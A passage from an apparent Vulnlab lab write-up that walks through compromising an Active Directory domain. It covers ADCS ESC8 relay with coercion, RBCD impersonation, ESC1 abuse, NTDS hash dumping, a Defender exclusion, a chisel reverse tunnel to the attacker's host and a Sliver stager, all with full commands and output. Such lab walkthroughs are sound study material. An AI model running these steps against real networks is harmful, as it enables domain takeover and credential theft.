    mspki-certificate-application-policy  : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Controllers   S-1-5-21-2679633274-2572298512-61362222-516
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
                                      IT-IFRIT\Enterprise Read-only Domain ControllersS-1-5-21-2679633274-2572298512-61362222-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : IT-Computers
    Schema Version                        : 2
    Validity Period                       : 500 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : Client Authentication, Server Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
                                      IT-IFRIT\FS02$                S-1-5-21-2679633274-2572298512-61362222-1104
      Object Control Permissions
        Owner                       : IT-IFRIT\Administrator        S-1-5-21-2679633274-2572298512-61362222-500
        WriteOwner Principals       : IT-IFRIT\Administrator        S-1-5-21-2679633274-2572298512-61362222-500
                                      IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Administrator        S-1-5-21-2679633274-2572298512-61362222-500
                                      IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Administrator        S-1-5-21-2679633274-2572298512-61362222-500
                                      IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519



Certify completed in 00:00:13.6888768

Find if some certificate templates are vulnerable:

[server] sliver (MEAN_PRIZE) > certify -- find -u 'SQL07$' --hashes ':f44427ad274bb6da32ace52c576e7716' -dc-ip 172.16.41.17 /vulnerable

[*] certify output:

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.1.0                               

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=it-ifrit,DC=vl'

[*] Listing info about the Enterprise CA 'it-ifrit-CA'

    Enterprise CA Name            : it-ifrit-CA
    DNS Hostname                  : DC07.it-ifrit.vl
    FullName                      : DC07.it-ifrit.vl\it-ifrit-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=it-ifrit-CA, DC=it-ifrit, DC=vl
    Cert Thumbprint               : 397DB9404F872A30ADE866CDDE2B5622DDB3FBD3
    Cert Serial                   : 6937EF87166E5A8246DB924ADE654400
    Cert Start Date               : 7/14/2024 2:55:36 AM
    Cert End Date                 : 9/4/2524 7:14:48 PM
    Cert Chain                    : CN=it-ifrit-CA,DC=it-ifrit,DC=vl
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
      Allow  ManageCA, ManageCertificates               IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!



Certify completed in 00:00:13.2648934

No vulnerable certificate template found

Then we will check the ADCS configuration itself if we can find ESC8 vulnerability.

Note that the ESC8 technique does not abuse certificate template misconfigurations.

Instead, this technique leverages the configuration of the Certificate Authority (CA) server.

Active Directory Certificate Authorities that are vulnerable to ESC8 meet the following conditions:

  • Web Enrollment: Enabled
  • Request Disposition: Issue

Check with Certipy to find ESC8-vulnerable CAs:

$ certipy-ad find -u 'SQL07$' -hashes ':f44427ad274bb6da32ace52c576e7716' -dc-ip 172.16.41.17 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'it-ifrit-CA' via CSRA
[!] Got error while trying to get CA configuration for 'it-ifrit-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'it-ifrit-CA' via RRP
[*] Got CA configuration for 'it-ifrit-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : it-ifrit-CA
    DNS Name                            : DC07.it-ifrit.vl
    Certificate Subject                 : CN=it-ifrit-CA, DC=it-ifrit, DC=vl
    Certificate Serial Number           : 6937EF87166E5A8246DB924ADE654400
    Certificate Validity Start          : 2024-07-14 09:55:36+00:00
    Certificate Validity End            : 2524-09-05 02:14:48+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : IT-IFRIT.VL\Administrators
      Access Rights
        ManageCertificates              : IT-IFRIT.VL\Administrators
                                          IT-IFRIT.VL\Domain Admins
                                          IT-IFRIT.VL\Enterprise Admins
        ManageCa                        : IT-IFRIT.VL\Administrators
                                          IT-IFRIT.VL\Domain Admins
                                          IT-IFRIT.VL\Enterprise Admins
        Enroll                          : IT-IFRIT.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates

ESC8 confirmed - NTLM Relay to AD CS HTTP Endpoints

ESC8 in action:

CDUW2301-001W Cyberblog AD CS Charts-ESC8

NTLM-Coercion-Page-1

Warning
  • For an unknow reason (need to troubleshoot more) using our NTLM relay with certipy relay or impacket-ntlmrelayx failed with Ligolo-ng

Because of the above warning, for a quick wokaround:

  • we stop ligolo-ng tunnel and we remove the routes to FS02 and DC07.
  • we add an exception folder for Defender in our sliver session on SQL07
  • we upload chisel on SQL07 then set a socks proxy
ligolo-ng Β» exit
$ sudo ip route del 172.16.41.17/32
$ sudo ip route del 172.16.41.251/32
[server] sliver >  execute -o powershell -ep bypass -c "Set-MpPreference -ExclusionPath c:\programdata\1"
[server] sliver >  upload -t 120 chisel.exe
$ chisel server --port 53 --reverse &
[server] sliver >  execute -o  chisel.exe client 10.8.0.230:53 R:socks

Configure the /etc/proxychains4.conf:

...
socks5 	127.0.0.1 1080

Now we have all to start our attack.

In our case, we will coerce fs02.it-ifrit.vl to authenticate to our machine and request a certificate using the following enabled template:

image

  1. Set Up NTLM Relay
$ proxychains -q certipy-ad relay -target 'http://172.16.41.17/'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting http://172.16.41.17/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
  1. Coerce Victim Machine & Request a Certificate for Victim
$ proxychains -q coercer coerce -u 'SQL07$@it-ifrit.vl' --hashes ':f44427ad274bb6da32ace52c576e7716' -l 10.8.0.230 -t 172.16.41.210 --always-continue
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target 172.16.41.210
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49668,49669,49673
[+] DCERPC port '49669' is accessible!
   [+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.8.0.230\x00') 
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.8.0.230\x00') 
[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\10.8.0.230\4QvBBsAx\aa') 
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
   [+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.8.0.230\uAJG5CYe\file.txt\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.8.0.230\4V1Ty6Y0\\x00') 
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.8.0.230\PrJlyyy2\x00') 
      [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.8.0.230@80/2OJ\share\file.txt\x00') 
^C
$ proxychains -q certipy-ad relay -target 'http://172.16.41.17/'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting http://172.16.41.17/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
IT-IFRIT\FS02$
[*] Requesting certificate for 'IT-IFRIT\\FS02$' based on the template 'Machine'
[-] Got error: timed out
[-] Use -debug to print a stacktrace
IT-IFRIT\FS02$
[*] Requesting certificate for 'IT-IFRIT\\FS02$' based on the template 'Machine'
[-] Got error: timed out
[-] Use -debug to print a stacktrace
IT-IFRIT\FS02$
[*] Requesting certificate for 'IT-IFRIT\\FS02$' based on the template 'Machine'
[*] Got certificate with DNS Host Name 'FS02.it-ifrit.vl'
[*] Certificate object SID is 'S-1-5-21-2679633274-2572298512-61362222-1104'
[*] Saved certificate and private key to 'fs02.pfx'
[*] Exiting...
  1. Impersonate Victim User
$ proxychains -q certipy-ad auth -pfx fs02.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: fs02$@it-ifrit.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'fs02.ccache'
[*] Trying to retrieve NT hash for 'fs02$'
[*] Got hash for 'fs02$@it-ifrit.vl': aad3b435b51404eeaad3b435b51404ee:162c1755d1c90a16d85e788760874b0b

We have successfully retrieved the hash for the FS02$ machine account and can impersonate FS02$.

Now with that our goal is to impersonate Administrator.

FS02 - RBCD abusing (Administrator)

Check that the target computer object FS02$ does not have the attribute msds-allowedtoactonbehalfofotheridentity:

$ proxychains -q impacket-rbcd -action read -delegate-to 'FS02$' it-ifrit.vl/'FS02$' -hashes ':162c1755d1c90a16d85e788760874b0b'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

RBCD from FS02$ to FS02$ (self) via S4U2Proxy:

$ proxychains -q impacket-rbcd -action write -delegate-from 'FS02$' -delegate-to 'FS02$' -dc-ip 172.16.41.17 it-ifrit.vl/'FS02$' -hashes ':162c1755d1c90a16d85e788760874b0b'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FS02$ can now impersonate users on FS02$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FS02$        (S-1-5-21-2679633274-2572298512-61362222-1104)

Request a Service Ticket(ST) with impersonate Administrator (will use S4U2Self/S4U2Proxy to request the ticket with protocol transition cifs):

  • As the account fs02$ has constrained delegation privileges, we use the -impersonate flag to request a ticket on behalf of administrator.
$ proxychains -q  impacket-getST -spn 'CIFS/FS02.it-ifrit.vl' -impersonate 'Administrator' it-ifrit.vl/'FS02$'@DC07.it-ifrit.vl -hashes ':162c1755d1c90a16d85e788760874b0b' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_FS02.it-ifrit.vl@IT-IFRIT.VL.ccache

Export and check the Service Ticket:

$ export KRB5CCNAME=Administrator@CIFS_FS02.it-ifrit.vl@IT-IFRIT.VL.ccache
$ klist
Ticket cache: FILE:Administrator@CIFS_FS02.it-ifrit.vl@IT-IFRIT.VL.ccache
Default principal: Administrator@it-ifrit.vl

Valid starting     Expires            Service principal
09/06/24 17:56:57  09/07/24 03:56:55  CIFS/FS02.it-ifrit.vl@IT-IFRIT.VL
	renew until 09/07/24 17:56:58
Note
  • If klist is not yet installed, you need to do $ sudo apt install krb5-user.

Then we can access to FS02 via WMI:

$ proxychains -q impacket-wmiexec Administrator@fs02.it-ifrit.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

Unfortunately seems no flag here:

C:\>dir Users\Administrator\Desktop\
 Volume in drive C has no label.
 Volume Serial Number is BE7F-13C2

 Directory of C:\Users\Administrator\Desktop

07/13/2024  09:55 AM    <DIR>          .
07/14/2024  06:43 AM    <DIR>          ..
07/13/2024  09:55 AM             2,304 Microsoft Edge.lnk
               1 File(s)          2,304 bytes
               2 Dir(s)   7,993,262,080 bytes free

Anyway we dump hashes and get the administrator hash to be able to reuse it in future:

...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd33b52af265c923a4cd896795c1118d:::
...
$ proxychains -q impacket-wmiexec Administrator@fs02.it-ifrit.vl -hashes ':bd33b52af265c923a4cd896795c1118d'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>exit

ADCS ESC1 exploiting (DC07$) (IT-IFRIT.VL\Administrator) (Ifrit_Dominance)

Before continue, we stop and remove chisel to back to ligolo-ng.

Then we remove all routes through ligolo-ng and we proceed like this for the new setup:

  • keep only the route for the host (DEV05) where Ligolo-ng agent is executed through the Vulnlab vpn adapter
  • remove all internal routes 172.16.41.0/24 through the Vulnlab vpn adapter
  • add all internal routes 172.16.41.0/24 through Ligolo-ng adapter
sudo ip route add 172.16.41.40/32 dev tun0
sudo ip route del 172.16.41.0/24
sudo ip route add 172.16.41.0/24 dev ligolo

Start again the Ligolo-ng tunnel and double check if it’s ok:

$ impacket-wmiexec Administrator@fs02.it-ifrit.vl -hashes ':bd33b52af265c923a4cd896795c1118d' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>exit

Confirmed all is ok.

From our previous certificate template enumeration we saw that the template IT-Computers can be vulnerable because:

  • ENROLLEE_SUPPLIES_SUBJECT
  • FS02$ has the enrollment rights:

image

When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication.

Abuse the IT-Computers template to obtain a PFX certificate as Administrator@it-ifrit.vl using its UPN:

$ certipy-ad req -u 'FS02$@it-ifrit.vl' -hashes ':162c1755d1c90a16d85e788760874b0b' -dc-ip 172.16.41.17 -ns 172.16.41.17 -dns-tcp -template 'IT-Computers' -ca it-ifrit-CA -key-size 4096 -upn 'Administrator@it-ifrit.vl' -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.16.41.17[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.16.41.17[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'Administrator@it-ifrit.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Then impersonate the victim user administrator to obtain its Ticket then NT Hash:

$ certipy-ad auth -pfx administrator.pfx -dc-ip 172.16.41.17 -ns 172.16.41.17 -dns-tcp 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@it-ifrit.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@it-ifrit.vl': aad3b435b51404eeaad3b435b51404ee:6b6b265c14e20192eb6a6dbb0a1426ba

Then we can access to DC07 via WinRM and get the 1st flag Ifrit_Dominance:

$ evil-winrm -u administrator -H '6b6b265c14e20192eb6a6dbb0a1426ba' -i dc07.it-ifrit.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/14/2024   6:04 AM             36 flag.txt
-a----         7/14/2024   2:18 AM           2304 Microsoft Edge.lnk


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{4d50fb57d3439d191251217b061a4351}

Then we proceed with a modern way (more safer for the DC) to DCSync:

$ nxc smb dc07.it-ifrit.vl -u administrator -H '6b6b265c14e20192eb6a6dbb0a1426ba' -M ntdsutil
SMB         172.16.41.17    445    DC07             [*] Windows Server 2022 Build 20348 x64 (name:DC07) (domain:it-ifrit.vl) (signing:True) (SMBv1:False)
SMB         172.16.41.17    445    DC07             [+] it-ifrit.vl\administrator:6b6b265c14e20192eb6a6dbb0a1426ba (Pwn3d!)
NTDSUTIL    172.16.41.17    445    DC07             [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\172569182
NTDSUTIL    172.16.41.17    445    DC07             Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    172.16.41.17    445    DC07             [+] NTDS.dit dumped to C:\Windows\Temp\172569182
NTDSUTIL    172.16.41.17    445    DC07             [*] Copying NTDS dump to /tmp/tmpt0m9lo1s
NTDSUTIL    172.16.41.17    445    DC07             [*] NTDS dump copied to /tmp/tmpt0m9lo1s
NTDSUTIL    172.16.41.17    445    DC07             [+] Deleted C:\Windows\Temp\172569182 remote dump directory
NTDSUTIL    172.16.41.17    445    DC07             [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    172.16.41.17    445    DC07             Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b6b265c14e20192eb6a6dbb0a1426ba:::
NTDSUTIL    172.16.41.17    445    DC07             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL    172.16.41.17    445    DC07             DC07$:1000:aad3b435b51404eeaad3b435b51404ee:900d979f63035de8b776ceec5999796b:::
NTDSUTIL    172.16.41.17    445    DC07             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:86225470b55ad07a4528cf442b1fff0c:::
NTDSUTIL    172.16.41.17    445    DC07             EU-IFRIT$:1103:aad3b435b51404eeaad3b435b51404ee:2faa80f42f8b1b14fb7726c4dabebf46:::
NTDSUTIL    172.16.41.17    445    DC07             FS02$:1104:aad3b435b51404eeaad3b435b51404ee:e9a98dfabf56e26ea6f5e2135683ff91:::
NTDSUTIL    172.16.41.17    445    DC07             SQL07$:1105:aad3b435b51404eeaad3b435b51404ee:d496882ddcabc0787dc48921fde09c0d:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\Georgina.Carey:1107:aad3b435b51404eeaad3b435b51404ee:26f6b01d8ed5903a9c0ea1add0eb817e:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\Joseph.Gould:1108:aad3b435b51404eeaad3b435b51404ee:2f25c1156f72bdcb30a00f97f03b3a78:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\Jonathan.Williamson:1109:aad3b435b51404eeaad3b435b51404ee:5dff3390d1de4869707240f0cbb59e4f:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\Sheila.Richards:1110:aad3b435b51404eeaad3b435b51404ee:084fa60567c6b124d0a4ca54fac5d3ce:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\Jessica.Parker:1111:aad3b435b51404eeaad3b435b51404ee:1d67363157f3a4582936006bb4407f2c:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\John.Ferguson:1112:aad3b435b51404eeaad3b435b51404ee:5c8154d630a7554ef70a6f6cd55abe18:::
NTDSUTIL    172.16.41.17    445    DC07             it-ifrit.vl\Lorraine.Morgan:1113:aad3b435b51404eeaad3b435b51404ee:c6882a60b40589fc2fc98b256b604a55:::
NTDSUTIL    172.16.41.17    445    DC07             FS01$:1116:aad3b435b51404eeaad3b435b51404ee:5452e27978cb440599d72bf8a7da0c56:::
NTDSUTIL    172.16.41.17    445    DC07             [+] Dumped 15 NTDS hashes to /home/himitsu/.nxc/logs/DC07_172.16.41.17_2024-09-07_155023.ntds of which 10 were added to the database
NTDSUTIL    172.16.41.17    445    DC07             [*] To extract only enabled accounts from the output file, run the following command: 
NTDSUTIL    172.16.41.17    445    DC07             [*] grep -iv disabled /home/himitsu/.nxc/logs/DC07_172.16.41.17_2024-09-07_155023.ntds | cut -d ':' -f1

Good as we get the hash of it-ifrit.vl\Sheila.Richards:084fa60567c6b124d0a4ca54fac5d3ce

VDI02 - Local Admin exploiting (Ifrit_Incursion)

Currently we have pwned SQL07 and DC07.

Quick check on FS02 (as nothing has been found in the admin’s desktop) if anything in shared folder:

$ nxc smb fs02.it-ifrit.vl -u 'fs02\administrator' -H 'bd33b52af265c923a4cd896795c1118d' -M spider_plus
SMB         172.16.41.210   445    FS02             [*] Windows Server 2022 Build 20348 x64 (name:FS02) (domain:it-ifrit.vl) (signing:False) (SMBv1:False)
SMB         172.16.41.210   445    FS02             [+] fs02\administrator:bd33b52af265c923a4cd896795c1118d (Pwn3d!)
SPIDER_PLUS 172.16.41.210   445    FS02             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 172.16.41.210   445    FS02             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 172.16.41.210   445    FS02             [*]     STATS_FLAG: True
SPIDER_PLUS 172.16.41.210   445    FS02             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 172.16.41.210   445    FS02             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 172.16.41.210   445    FS02             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 172.16.41.210   445    FS02             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         172.16.41.210   445    FS02             [*] Enumerated shares
SMB         172.16.41.210   445    FS02             Share           Permissions     Remark
SMB         172.16.41.210   445    FS02             -----           -----------     ------
SMB         172.16.41.210   445    FS02             ADMIN$          READ,WRITE      Remote Admin
SMB         172.16.41.210   445    FS02             C$              READ,WRITE      Default share
SMB         172.16.41.210   445    FS02             IPC$            READ            Remote IPC
SMB         172.16.41.210   445    FS02             it              READ,WRITE      admin share

Found it

Dig on it shared folder:

─(himitsuγ‰Ώcountzero)-[~/Downloads/VULNLAB/Ifrit]
└─$ smbclient -U 'fs02/administrator' --password 'bd33b52af265c923a4cd896795c1118d' --pw-nt-hash //172.16.41.210/'it' 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  7 10:34:17 2024
  ..                                DHS        0  Sat Sep  7 10:34:12 2024
  Autologon64.exe                     A   441224  Sun Jul 14 01:55:46 2024
  pipelist64.exe                      A   441720  Sun Jul 14 01:55:58 2024
  procdump64.exe                      A   424856  Sun Jul 14 01:55:59 2024
  Procmon64.exe                       A  2142648  Sun Jul 14 01:56:02 2024
  PsService64.exe                     A   322440  Sun Jul 14 01:55:55 2024
  ShareEnum64.exe                     A   643480  Sun Jul 14 01:55:52 2024
  Sysmon64.exe                        A  4545344  Sun Jul 14 01:55:50 2024
  Temp                                D        0  Sun Jul 14 01:56:11 2024

		6261499 blocks of size 4096. 2009259 blocks available
smb: \> quit

Nothing interesting

Step back on our last findings:

  • Sheila.Richards is a member of VDI-ADMINS
  • We have the NTHash of Sheila
  • We have access to VDI02 not yet pwned

Quick connect with the RDP profile to VDI02 and check who is present in local admin group:

Z:\> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
EU-IFRIT\Domain Admins
IFRIT\Domain Admins
IT-IFRIT\vdi-admins
The command completed successfully.

Ok so Sheila is a local admin on VDI02

Access via WinRM:

$ evil-winrm -u Sheila.Richards -H '084fa60567c6b124d0a4ca54fac5d3ce' -i vdi02.eu-ifrit.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sheila.richards\Documents> 

Grab the 3rd flag Ifrit_Incursion:

*Evil-WinRM* PS C:\Users\sheila.richards\Documents> cd ../..
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          8/2/2024   2:17 AM                .NET v4.5
d-----          8/2/2024   2:17 AM                .NET v4.5 Classic
d-----         7/14/2024   6:47 AM                Administrator
d-----          8/2/2024   2:42 AM                administrator.EU-IFRIT
d-----          8/2/2024   2:35 AM                Caroline.Hunter
d-----         7/14/2024   6:47 AM                charlotte.cooper
d-----          9/6/2024   6:41 PM                Jemma.Smith
d-----          9/6/2024  12:56 PM                Michelle.Jordan
d-----          9/6/2024   6:59 PM                Mohammed.Ward
d-----         7/14/2024   6:47 AM                patrick.ford
d-r---         7/14/2024   6:47 AM                Public
d-----         7/14/2024   6:47 AM                sheila.richards


*Evil-WinRM* PS C:\Users> dir Administrator/Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/14/2024   6:04 AM             36 flag.txt
-a----         7/28/2024   8:22 AM           2304 Microsoft Edge.lnk


*Evil-WinRM* PS C:\Users> type Administrator/Desktop/flag.txt
VL{17633df915d508c81bdfdecb86f5e83f}

Now we will dump all hashes of VDI02, but as we don’t want to trigger any alert, we upload and activate our Sliver PoSH stager:

*Evil-WinRM* PS C:\Users\sheila.richards\Documents> mkdir C:\programdata\1


    Directory: C:\programdata


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          9/7/2024  12:32 AM                1


*Evil-WinRM* PS C:\Users\sheila.richards\Documents> upload stage5.ps1 C:\programdata\1\stage5.ps1
                                        
Info: Uploading /home/himitsu/Downloads/VULNLAB/Ifrit/stage5.ps1 to C:\programdata\1\stage5.ps1
                                        
Data: 14036 bytes of 14036 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\sheila.richards\Documents> cd  C:\programdata\1
*Evil-WinRM* PS C:\programdata\1> ./stage5.ps1
True
0
True
True

We get a new session as Sheila then we dump the hashes:

[*] Session c9f826b0 MEAN_PRIZE - 172.16.40.225:60090 (VDI02) - windows/amd64 - Sat, 07 Sep 2024 16:33:50 JST

[server] sliver (MEAN_PRIZE) > use c9f826b0-bcd6-4063-ac21-ae6680f26615

[*] Active session MEAN_PRIZE (c9f826b0-bcd6-4063-ac21-ae6680f26615)

[server] sliver (MEAN_PRIZE) > sessions 

 ID         Transport   Remote Address        Hostname   Username                   Operating System   Health  
========== =========== ===================== ========== ========================== ================== =========
 d95e01c4   http(s)     172.16.41.40:52706    DEV05      EU-IFRIT\jack.smith        windows/amd64      [ALIVE] 
 c9f826b0   http(s)     172.16.40.225:60090   VDI02      IT-IFRIT\Sheila.Richards   windows/amd64      [ALIVE] 

[server] sliver (MEAN_PRIZE) > sharpsecdump -t 900 '' -target=172.16.40.225

[*] sharpsecdump output:
[*] RemoteRegistry service started on 172.16.40.225
